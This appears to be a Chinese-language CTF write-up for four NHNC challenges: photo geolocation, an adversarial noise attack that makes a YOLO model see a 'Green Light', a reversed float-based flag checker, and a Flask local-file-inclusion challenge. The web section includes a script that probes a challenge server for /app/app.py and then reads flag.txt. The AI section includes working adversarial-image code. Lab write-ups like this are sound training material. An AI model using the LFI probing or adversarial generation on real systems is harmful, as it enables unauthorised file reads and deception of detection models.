Misc

Travel

Challenge

This is a photo I took some time ago, but I’ve forgotten exactly where I was when I took it. Can you figure out which building I was inside when I captured this image? Flag format: NHNC{<address_on_google_maps>} Replace all commas and spaces in the address with underscores (_). For example, if the correct address is:1 Chome-29-13 Sengoku, Bunkyo City, Tokyo 112-0011, Japan,Then the correct flag would be:NHNC{1_Chome-29-13_Sengoku_Bunkyo City_Tokyo_112-0011_Japan}

Solution

识图发现是广岛县贺茂泉附近果味饱满，米香动人，生酒就是这么好喝！_贺茂泉_西条_广岛县

然后发现图中右上角的塔位于（公社）広島県環境保全センター東広島支所 - Google 地图

在附近搜索找到目标位置Hotel Route Inn East Hiroshima Saijo Station - Google 地图

14-24 Saijohonmachi, Higashihiroshima, Hiroshima 739-0011日本

flag

🚩NHNC{14-24_Saijohonmachi_Higashihiroshima_Hiroshima_739-0011_Japan}

attack CNN?

Challenge

Did u know how to attack CNN?

text

1different_prediction = result_v8["class_name"] != result_v10["class_name"]2confidence_gap = abs(result_v8["confidence"] - result_v10["confidence"]) >= 0.4

http://chal.78727867.xyz:5000/

Solution

题目附件提供了 yolo_v8.pt 和 yolo_v10.pt

这题考察的是对抗攻击，具体来说是生成式对抗样本（Adversarial Example Generation）

我们的目标是从零（从随机噪声）开始，通过优化方法“创造”一张能让模型高置信度识别出特定目标的图片

在本题中，生成一张噪声图片使得任意一个模型识别出任意一个置信度大于等于0.4的目标结果即可，因为另一个模型识别这张噪声图片极大概率是识别不出什么东西的（也就是置信度等于0），这样一来二者的置信度之差就大于等于0.4了

我选择的是 yolo_v8.pt 的 Green Light

exp如下：

python

1import torch2import numpy as np3from PIL import Image4import matplotlib.pyplot as plt5from ultralytics import YOLO6 7# --- 1. 配置参数 ---8MODEL_PATH = 'yolo_v8.pt' 9TARGET_CLASS_ID = 0 10CONFIDENCE_THRESHOLD = 0.9011 12# 优化参数13LEARNING_RATE = 0.0114ITERATIONS = 50015IMG_SIZE = 64016 17# --- 2. 加载模型 ---18print(f"正在加载您的模型: {MODEL_PATH}...")19model = YOLO(MODEL_PATH)20device = 'cuda' if torch.cuda.is_available() else 'cpu'21model.to(device)22model.eval()23 24class_names = model.names25target_class_name = class_names.get(TARGET_CLASS_ID, f"ID_{TARGET_CLASS_ID}")26print(f"模型加载完毕。攻击目标 -> 类别: '{target_class_name}' (ID: {TARGET_CLASS_ID})")27 28# --- 3. 初始化噪声图片 ---29adversarial_image = torch.rand(1, 3, IMG_SIZE, IMG_SIZE, 30                               device=device, 31                               requires_grad=True)32optimizer = torch.optim.Adam([adversarial_image], lr=LEARNING_RATE)33 34# 获取模型中类别数量和坐标数量35num_classes = len(class_names)36num_coords = 437target_class_index_in_raw_output = num_coords + TARGET_CLASS_ID38 39print("\n开始优化图片 (采用直接攻击原始输出的策略)...")40# --- 4. 迭代优化 ---41for i in range(ITERATIONS):42    optimizer.zero_grad()43 44    preds = model.model(adversarial_image)[0] 45 46    preds = preds.permute(0, 2, 1)47 48    target_scores = preds[0, :, target_class_index_in_raw_output]49    50    max_score = target_scores.max()51    52    loss = -max_score53    54    loss.backward()55    optimizer.step()56 57    with torch.no_grad():58        adversarial_image.clamp_(0, 1)59 60    print(f"\r迭代 {i+1}/{ITERATIONS} | 目标类别最高原始分数: {max_score.item():.4f}", end="")61    62print(f"\n\n优化完成。最终目标类别最高原始分数: {max_score.item():.4f}")63 64# --- 5. 验证和保存 ---65print("\n正在用标准预测方法验证最终生成的图片...")66 67final_results = model.predict(adversarial_image, verbose=False)68 69final_image_tensor = adversarial_image.squeeze(0).detach().cpu()70final_image_numpy = final_image_tensor.permute(1, 2, 0).numpy()71final_image_uint8 = (final_image_numpy * 255).astype(np.uint8)72img_pil = Image.fromarray(final_image_uint8)73output_filename = f"adversarial_image_for_{target_class_name.replace(' ', '_')}.png"74img_pil.save(output_filename)75print(f"对抗性图片已保存为: {output_filename}")76 77print("\n模型在最终图片上的识别结果:")78final_results[0].show()79 80final_boxes = final_results[0].boxes81found = False82if len(final_boxes) > 0:83    for box in final_boxes:84        class_id = int(box.cls)85        conf = float(box.conf)86        if class_id == TARGET_CLASS_ID and conf >= CONFIDENCE_THRESHOLD:87            print(f"\n攻击成功! 检测到 '{class_names.get(class_id)}'，置信度: {conf:.4f} (已超过 {CONFIDENCE_THRESHOLD})")88            found = True89            break90    if not found:91        # 如果没找到目标，打印置信度最高的那个结果92        top_box_index = final_boxes.conf.argmax()93        top_box = final_boxes[top_box_index]94        top_class_id = int(top_box.cls)95        top_conf = float(top_box.conf)96        print(f"\n⚠️ 攻击部分成功，但置信度未达标或目标错误。")97        print(f"置信度最高的检测是 '{class_names.get(top_class_id)}' ({top_conf:.4f})")98else:99     print("\n❌ 攻击失败，模型在最终生成的图片上未检测到任何物体。")100 101plt.imshow(img_pil)102plt.title(f"Generated Noise Image (Target: '{target_class_name}')")103plt.axis('off')104plt.show()

运行结果如下：

text

1正在加载您的模型: yolo_v8.pt...2模型加载完毕。攻击目标 -> 类别: 'Green Light' (ID: 0)34开始优化图片 (采用直接攻击原始输出的策略)...5迭代 500/500 | 目标类别最高原始分数: 0.997267优化完成。最终目标类别最高原始分数: 0.997289正在用标准预测方法验证最终生成的图片...10对抗性图片已保存为: adversarial_image_for_Green_Light.png1112模型在最终图片上的识别结果:1314攻击成功! 检测到 'Green Light'，置信度: 0.9972 (已超过 0.9)

原图：

下图是将图片上传到靶机中的识别结果：

flag

🚩NHNC{you_kn0w_h0w_t0_d0_adv3rs3ria1_attack}

Reverse

flag checker

Challenge

You are doing a mission and you need to find out the secret

Solution

sub_123E 是核心函数，它对用户输入进行一系列复杂的验证。这题的目标是构造一个能通过 sub_123E 所有检查的输入字符串，这个字符串就是 flag。

先分析关键的辅助函数：

sub_1189(float a1) -> (int)a1: 将浮点数强制转换为整数，即截断小数部分。
sub_119D(float a1) -> LODWORD(a1): 获取浮点数在内存中的32位二进制表示。例如，sub_119D(1.0f) 返回的不是整数 1，而是 1.0f 的IEEE 754表示 0x3F800000。
sub_11DC(uint8_t a1, char a2) -> ROL(a1, a2): 8位循环左移。
sub_120D(uint8_t a1, char a2) -> ROR(a1, a2): 8位循环右移。

此外，代码中充斥着形如 *(double *)_mm_cvtsi32_si128(0x420FE9E1u).m128i_i64 的SSE指令，这实际上是反编译器表示“将一个32位整数的位模式（bit pattern）解释为单精度浮点数”的复杂方式。例如，0x420FE9E1 在内存中就是浮点数 35.8568…。

sub_123E 函数由40多个独立的 if 条件构成，每个条件验证Flag中的一个字符。这些验证可以分为三类：

A. 直接计算型
大部分字符可以通过直接的逆向计算得出。

示例 a1[5]:
- C代码: (unsigned __int8)sub_120D(sub_1189(float(0x420FE9E1)), 1LL) - 39 != a1[5]
- 分析:
  1. float(0x420FE9E1) -> 35.8568
  2. sub_1189(35.8568) -> 35
  3. sub_120D(35, 1) -> ROR(35, 1) -> ROR(0b00100011, 1) -> 0b10010001 -> 145
  4. 145 - 39 = 106
- 结论: a1[5] 必须是 106 (ASCII: ‘j’)。

B. 搜索/穷举型
有几个字符的值被用作计算的一部分，需要在一个小范围内（如所有可打印ASCII字符）进行搜索。

示例 a1[0]:
- C代码: (unsigned int)sub_1189((float)*a1 * 3.1415) != 245
- 分析: 我们需要找到一个字符 c，使得 int(c * 3.1415) 的结果是 245。
- 解法: 245 <= c * 3.1415 < 246。解得 77.99 <= c < 78.31。唯一的整数解是 78。
- 结论: a1[0] 必须是 78 (ASCII: ‘N’)。

C. 关键陷阱：C语言类型转换
在初步解题时，一个 ValueError 暴露了一个常见的逆向陷阱。

示例 a1[10]:
- C代码: (unsigned __int8)sub_119D(float(0x40B37B4A)) + 41 != a1[10]
- 错误的解读: sub_119D(…) + 41。这会导致 0x40B37B4A + 41，一个巨大的数字。
- 正确的解读: C语言的 (unsigned __int8) 类型转换会先于加法运算。这意味着必须先将 sub_119D 的32位结果截断为8位，然后再加 41。
  1.
  2. sub_119D(float(0x40B37B4A)) -> 0x40B37B4A
  3. (unsigned __int8)(0x40B37B4A) -> 0x4A (十进制 74)
  4. 74 + 41 = 115
- 结论: a1[10] 必须是 115 (ASCII: ‘s’)。

python

1import struct2 3# -------------------------------------------------------------------4# Helper functions to replicate the binary's logic5# -------------------------------------------------------------------6 7def float_from_hex(hex_val: int) -> float:8    """9    Takes a 32-bit integer and interprets its bit pattern as a10    little-endian single-precision float.11    Equivalent to: *(float*)&hex_val12    """13    return struct.unpack('<f', struct.pack('<I', hex_val))[0]14 15def sub_1189(f: float) -> int:16    """17    Replicates sub_1189: Casts float to int (truncates).18    """19    return int(f)20 21def sub_119D(f: float) -> int:22    """23    Replicates sub_119D: Returns the 32-bit integer representation of a float.24    Equivalent to: LODWORD(f) or *(int*)&f25    """26    return struct.unpack('<I', struct.pack('<f', f))[0]27 28def rol(val: int, r_bits: int) -> int:29    """30    Replicates sub_11DC: 8-bit rotate left.31    """32    return ((val << r_bits) | (val >> (8 - r_bits))) & 0xFF33 34def ror(val: int, r_bits: int) -> int:35    """36    Replicates sub_120D: 8-bit rotate right.37    """38    return ((val >> r_bits) | (val << (8 - r_bits))) & 0xFF39 40# Note: The complex C expression:41# (((unsigned int)((X) >> 31) >> 24) + (X)) - ((unsigned int)((X) >> 31) >> 24)42# is a compiler's convoluted way of expressing (X % 256).43# We will use the simpler Python equivalent `X % 256`.44 45# -------------------------------------------------------------------46# Main solving logic47# -------------------------------------------------------------------48 49def solve():50    """51    Reverses the logic from sub_123E to find the flag.52    """53    # The flag has 46 characters (indices 0 to 45)54    flag = [0] * 4655 56    # --- Character calculations based on the conditions in sub_123E ---57 58    # a1[5]59    v1 = sub_1189(float_from_hex(0x420FE9E1)) # int(35.85) -> 3560    flag[5] = ror(v1, 1) - 3961 62    # a1[0] - This is a search63    # int(a1[0] * 3.1415) == 24564    for i in range(32, 127):65        if sub_1189(i * 3.1415) == 245:66            flag[0] = i67            break68 69    # a1[44]70    v4 = sub_1189(float_from_hex(0x406CCCCD)) # int(3.7) -> 371    flag[44] = rol(v4, 7) - 7672 73    # a1[19]74    flag[19] = (sub_119D(float_from_hex(0x3F800000)) >> 24) + 32 # bits(1.0)75 76    # a1[12]77    v5 = sub_1189(float_from_hex(0x42B16C22)) # int(88.82) -> 8878    flag[12] = ror(v5, 4) - 2479 80    # a1[33] - CORRECTED81    flag[33] = (sub_119D(float_from_hex(0x3FA00000)) & 0xFF) + 55 # (uint8_t)bits(1.25) + 5582 83    # a1[2]84    v6 = sub_1189(float_from_hex(0x419CF5C3)) # int(19.62) -> 1985    flag[2] = rol(v6, 3) - 7486 87    # a1[25]88    flag[25] = sub_1189(float_from_hex(0x40A00000)) % 7 + 44 # int(5.0)89 90    # a1[17]91    v7 = sub_1189(float_from_hex(0x3F800000)) # int(1.0) -> 192    flag[17] = ror(v7, 1) - 8093 94    # a1[8] - This is a search95    # rol(int(a1[8] * 1.5), 2) - 18 == a1[8]96    for i in range(32, 127):97        if rol(sub_1189(i * 1.5), 2) - 18 == i:98            flag[8] = i99            break100 101    # a1[30]102    flag[30] = (sub_119D(float_from_hex(0x3F000000)) >> 24) - 15 # bits(0.5)103 104    # a1[41]105    flag[41] = ((sub_119D(float_from_hex(0x3F800000)) >> 8) & 0xFF) + 105 # (bits(1.0) >> 8)106 107    # a1[6]108    v10 = sub_1189(float_from_hex(0x41316C22)) # int(11.08) -> 11109    flag[6] = (2 * v10 + 95) % 256110 111    # a1[21]112    v11 = sub_1189(float_from_hex(0x40E00000)) # int(7.0) -> 7113    flag[21] = (4 * (v11 + 20)) % 256114 115    # a1[13]116    v12 = sub_1189(float_from_hex(0x41082681)) # int(8.51) -> 8117    flag[13] = (v12 + 43) % 256118    119    # a1[29]120    flag[29] = sub_1189(float_from_hex(0x41200000)) // 5 + 110 # int(10.0)121 122    # a1[3]123    flag[3] = ((sub_119D(float_from_hex(0x411B4673)) >> 16) & 0xFF) + 40 # (bits(9.7) >> 16)124 125    # a1[27]126    flag[27] = ((sub_119D(float_from_hex(0x3FC00000)) >> 8) & 0xFF) + 103 # (bits(1.5) >> 8)127 128    # a1[14]129    flag[14] = (sub_119D(float_from_hex(0x41F66B86)) >> 24) + 30 # bits(30.8)130 131    # a1[9]132    flag[9] = sub_1189(float_from_hex(0x416C902E)) // 3 + 91 # int(14.78)133 134    # a1[16]135    v13 = sub_1189(float_from_hex(0x406C902E)) # int(3.69) -> 3136    flag[16] = (3 * v13 + 39) % 256137 138    # a1[1]139    flag[1] = 72140 141    # a1[23]142    flag[23] = ((sub_119D(float_from_hex(0x40000000)) >> 16) & 0xFF) + 52 # (bits(2.0) >> 16)143    144    # a1[11] - This is a search145    # int(a1[11] * 7.77) % 5 + 46 == a1[11]146    for i in range(32, 127):147        if sub_1189(i * 7.77) % 5 + 46 == i:148            flag[11] = i149            break150            151    # a1[24]152    v15 = sub_1189(float_from_hex(0x40400000)) # int(3.0) -> 3153    flag[24] = ror(v15, 3) + 20154 155    # a1[37]156    flag[37] = sub_1189(float_from_hex(0x41080000)) % 4 + 51 # int(8.5)157 158    # a1[34]159    v16 = sub_1189(float_from_hex(0x40B00000)) # int(5.5) -> 5160    flag[34] = rol(v16, 5) - 65161 162    # a1[36]163    v17 = sub_1189(float_from_hex(0x40F00000)) # int(7.5) -> 7164    flag[36] = ror(v17, 6) + 84165    166    # a1[20]167    v18 = sub_1189(float_from_hex(0x40C00000)) # int(6.0) -> 6168    flag[20] = rol(v18, 1) + 90169    170    # a1[31]171    v19 = sub_1189(float_from_hex(0x40000000)) # int(2.0) -> 2172    flag[31] = ror(v19, 2) - 23173 174    # a1[10] - CORRECTED175    flag[10] = (sub_119D(float_from_hex(0x40B37B4A)) & 0xFF) + 41 # (uint8_t)bits(5.61) + 41176 177    # a1[26]178    flag[26] = 2 * (sub_1189(float_from_hex(0x40C80000)) + 49) # int(6.25)179    180    # a1[39]181    v20 = sub_1189(float_from_hex(0x408CCCCD)) # int(4.4) -> 4182    flag[39] = rol(v20, 1) + 89183 184    # a1[15]185    v21 = sub_1189(float_from_hex(0x413313AA)) # int(11.19) -> 11186    flag[15] = rol(v21, 2) + 55187 188    # a1[35]189    v22 = sub_1189(float_from_hex(0x40D00000)) # int(6.5) -> 6190    flag[35] = (v22 + 42) % 256191    192    # a1[32]193    flag[32] = 2 * (sub_1189(float_from_hex(0x41100000)) % 10 + 46) # int(9.0)194 195    # a1[18]196    v23 = sub_1189(float_from_hex(0x40A00000)) # int(5.0) -> 5197    flag[18] = (v23 + 103) % 256198 199    # a1[28]200    v24 = sub_1189(float_from_hex(0x41100000)) # int(9.0) -> 9201    flag[28] = rol(v24, 4) - 49202    203    # a1[22]204    flag[22] = sub_1189(float_from_hex(0x41000000)) // 2 + 107 # int(8.0)205 206    # a1[7]207    flag[7] = ((sub_119D(float_from_hex(0x42607127)) >> 8) & 0xFF) + 2 # (bits(56.1) >> 8)208 209    # a1[43]210    v25 = sub_1189(float_from_hex(0x4013D70A)) # int(2.23) -> 2211    flag[43] = (v25 + 108) % 256212 213    # a1[40]214    v26 = sub_1189(float_from_hex(0x40D33334)) # int(6.6) -> 6215    flag[40] = (5 * v26 + 25) % 256216    217    # a1[4] - This is a search218    # (int(a1[4] * 2.5) + 72) % 256 == a1[4]219    for i in range(32, 127):220        if (sub_1189(i * 2.5) + 72) % 256 == i:221            flag[4] = i222            break223            224    # a1[38]225    flag[38] = ((sub_119D(float_from_hex(0x40000000)) >> 16) & 0xFF) + 114 # (bits(2.0) >> 16)226 227    # a1[42]228    v29 = sub_1189(float_from_hex(0x400CCCCD)) # int(2.2) -> 2229    flag[42] = ror(v29, 3) + 47230    231    # a1[45]232    flag[45] = 125233 234    # --- Final result ---235    result_string = "".join(chr(c) for c in flag)236    print(result_string)237 238if __name__ == "__main__":239    solve()

flag

🚩NHNC{jus7_s0m3_c00l_flo4t1ng_p0in7_0p3ra7ion5}

Web

dkri3c1_love_cat

Challenge

I like cat cat cat & banana

Hint: Flag is in the same directory as app.py

Solution

明显是LFI，但又不知道在哪，让AI搓一个脚本尝试

python

1import requests2import sys3from urllib.parse import urljoin4 5# --- 配置 ---6# 靶机基础URL7BASE_URL = "http://chal.78727867.xyz:1234/view"8 9# 常见的app.py可能存在的路径列表（字典）10# 我们也包含了一些其他常见的文件名，以防万一11POSSIBLE_PATHS = [12    '/app/app.py',13    '/app.py',14    '/var/www/app.py',15    '/var/www/html/app.py',16    '/srv/app.py',17    '/srv/www/app.py',18    '/usr/src/app/app.py',19    '/opt/app/app.py',20    '/home/www-data/app.py',21    '/home/user/app.py',22    '/home/ctf/app.py',23    '/root/app.py',24    # 也可以尝试其他常见名字25    '/app/main.py',26    '/main.py',27    '/app/server.py',28    '/server.py',29]30 31print("--- 开始通过LFI漏洞寻找 app.py ---")32print(f"目标URL: {BASE_URL}")33 34# --- 循环尝试 ---35found_path = None36for path in POSSIBLE_PATHS:37    # 构造完整的请求URL38    # params参数会自动处理URL编码39    params = {'img': path}40    41    print(f"[*] 正在尝试路径: {path}")42 43    try:44        # 发送GET请求，设置一个超时以防服务器无响应45        response = requests.get(BASE_URL, params=params, timeout=10)46 47        # --- 检查是否成功 ---48        # 1. 状态码必须是 20049        # 2. 响应内容不能是常见的错误信息（有些服务器即使文件不存在也返回200）50        # 3. 响应内容应该包含Python代码的特征，如 'import', 'def', 'Flask'等51        if response.status_code == 200:52            content = response.text53            print("\n" + "="*50)54            print(f"[+] 成功! 找到文件路径: {path}")55            print("="*50)56            print("\n--- 文件内容预览 (前500个字符) ---")57            print(content[:500])58            print("--------------------------------------------")59            found_path = path60            break  # 找到后就停止循环61        else:62            print(f"    [-] 失败，状态码: {response.status_code}")63 64    except requests.exceptions.RequestException as e:65        print(f"[!] 请求异常: {e}")66        continue67 68# --- 结果总结 ---69if found_path:70    # 题目说Flag在同一目录，所以我们推断flag的文件名71    # 通常是 flag, flag.txt, Flag 等72    directory = found_path.rsplit('/', 1)[0]73    flag_path_guess = f"{directory}/flag.txt" # 先猜一个常见的flag.txt74    75    print("\n[+] 任务完成!")76    print(f"下一步，请尝试读取Flag。Flag与app.py在同一目录 ({directory})。")77    print(f"你可以尝试访问以下URL来获取Flag:")78    79    # 构造并打印可能的flag URL80    flag_url = f"{BASE_URL}?img={flag_path_guess}"81    print(f"    - {flag_url}")82    print(f"如果不行，再试试 'flag' 或者其他文件名，例如: {BASE_URL}?img={directory}/flag")83else:84    print("\n" + "="*50)85    print("[-] 失败: 在给定的路径列表中没有找到 app.py。")86    print("[-] 你可能需要编辑脚本中的 `POSSIBLE_PATHS` 列表，添加更多可能的路径。")87    print("="*50)

运行结果如下：

text

1--- 开始通过LFI漏洞寻找 app.py ---2目标URL: http://chal.78727867.xyz:1234/view3[*] 正在尝试路径: /app/app.py45==================================================6[+] 成功! 找到文件路径: /app/app.py7==================================================89--- 文件内容预览 (前500个字符) ---10from flask import Flask, request, send_file, abort11import os1213app = Flask(__name__)1415@app.route('/')16def index():17    return     '''1819        <h1> 🐱 Welcome to dkri3c1's Cat Photo Shop </h1>20        <p>Cat is Cuteeeee :D </p>21        <code>BTW, You can use /view?img=cat.png to view Cute Catttt </code>22            <br></br>23        <img src="static/images/cat.png" width="500" height="500">24    '''2526@app.route('/view')27def view_image():28    img = request.args.get('img', '')2930--------------------------------------------3132[+] 任务完成!33下一步，请尝试读取Flag。Flag与app.py在同一目录 (/app)。34你可以尝试访问以下URL来获取Flag:35    - http://chal.78727867.xyz:1234/view?img=/app/flag.txt36如果不行，再试试 'flag' 或者其他文件名，例如: http://chal.78727867.xyz:1234/view?img=/app/flag

访问http://chal.78727867.xyz:1234/view?img=/app/flag.txt就拿到flag了

flag

🚩NHNC{dkri3c1_Like_Cat_oUo_>_<_c8763}